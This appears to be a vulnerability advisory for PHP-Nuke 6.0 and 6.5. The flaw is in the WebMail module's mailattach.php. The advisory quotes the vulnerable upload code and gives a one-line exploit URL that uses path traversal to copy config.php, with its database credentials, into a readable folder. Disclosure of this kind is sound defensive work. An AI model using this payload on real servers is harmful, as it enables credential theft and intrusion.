‘PHP-Nuke WebMail Command Execution Vulnerability (Mailattach)’

Summary

PHP-Nuke is an open-source program for creating and managing news-based Web sites created by Francisco Burzi. PHP-Nuke could allow a remote attacker to include malicious PHP files, caused by a vulnerability in the WebMail module and all other modules with the ability to upload files. ‘

Credit:

‘The information has been provided by Frog Man.’


Details

Vulnerable systems:
 * PHP-Nuke version 6.0
 * PHP-Nuke version6.5

A remote attacker can send a specially crafted URL request to the mailattach.php script that specifies a malicious PHP file from a remote system as a parameter, which would allow the attacker to execute code on the vulnerable Web server, and possibly obtain a user’s database password.

Vulnerable code:
From mailattach.php file:
if (isset($userfile) AND $userfile != ‘none’) {
    if (ini_get(file_uploads) AND $attachments == 1) {
  $updir = ‘tmp’;
  @copy($userfile, ‘$updir/$userfile_name’);

Exploit:
http://target.server/modules/WebMail/mailattach.php?userfile=../../config.php&userfile_name=../attachments/file.txt&attachments=1′

Categories: UNIX